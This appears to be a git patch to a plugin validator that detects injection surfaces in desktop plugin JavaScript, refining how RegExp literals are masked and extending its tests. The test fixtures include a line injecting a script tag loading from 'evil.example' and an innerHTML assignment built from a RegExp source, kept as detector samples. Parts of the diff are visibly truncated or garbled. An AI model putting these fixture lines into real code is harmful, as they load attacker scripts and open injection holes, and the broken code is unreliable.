From 5765f8d1900e01026458caca361bc94040a9dc89 Mon Sep 17 00:00:00 2001
From: teknium1 <127238744+teknium1@users.noreply.github.com>
Date: Wed, 23 Sep 2026 19:51:52 -0700
Subject: [PATCH] =?UTF-8?q?fix(plugins):=20desktop=20lint=20masks=20a=20ne?=
=?UTF-8?q?w=20RegExp("").source`, a real
injection through .source — desktop_surface_findings returned 0 findings for
that line. The literal is now masked only when the constructor is the argument
of .replace/.replaceAll/.split/.match/.matchAll/.search or the receiver of
.test/.exec; every other use (.source, .toString(), template interpolation) is
a string-builder and keeps firing. The existing test gains the .source line
(must flag) and a .test() line (must not).
---
hermes_cli/plugin_validate_desktop.py | 12 +++++++++---
tests/hermes_cli/test_plugin_validate.py | 5 +++++
website/docs/user-guide/features/plugin-catalog.md | 8 +++++---
3 files changed, 19 insertions(+), 6 deletions(-)
diff --git a/hermes_cli/plugin_validate_desktop.py b/hermes_cli/plugin_validate_desktop.py
index 2ee8f9415e..b11d7c0c56 100644
--- a/hermes_cli/plugin_validate_desktop.py
+++ b/hermes_cli/plugin_validate_desktop.py
@@ -43,15 +43,21 @@ _COMMENT = re.compile(r"/\*.*?\*/|(?").source``) the constructor is
+# a string-builder and its literal keeps firing.
_REGEX_LITERAL = re.compile(r"(? str:
masked = _REGEX_LITERAL.sub(lambda m: " " * len(m.group(0)), source)
- return _REGEXP_CTOR_PATTERN.sub(lambda m: " " * len(m.group(0)), masked)
+ return _REGEXP_CTOR_MATCHER.sub(lambda m: " " * len(m.group(0)), masked)
def desktop_surface_findings(source: str) -> List[Tuple[str, int]]:
diff --git a/tests/hermes_cli/test_plugin_validate.py b/tests/hermes_cli/test_plugin_validate.py
index 5e3aea7c03..672c39129a 100644
--- a/tests/hermes_cli/test_plugin_validate.py
+++ b/tests/hermes_cli/test_plugin_validate.py
@@ -294,15 +294,20 @@ class TestDesktopSurface:
"const tag = document.createElement('script'); tag.src = 'https://evil.example/x.js'; document.head.append(tag)\n"
"const dyn = html.replace(new RegExp(\"'\n"
+ "el.innerHTML = new RegExp(\"\").source\n"
+ "if (new RegExp(\"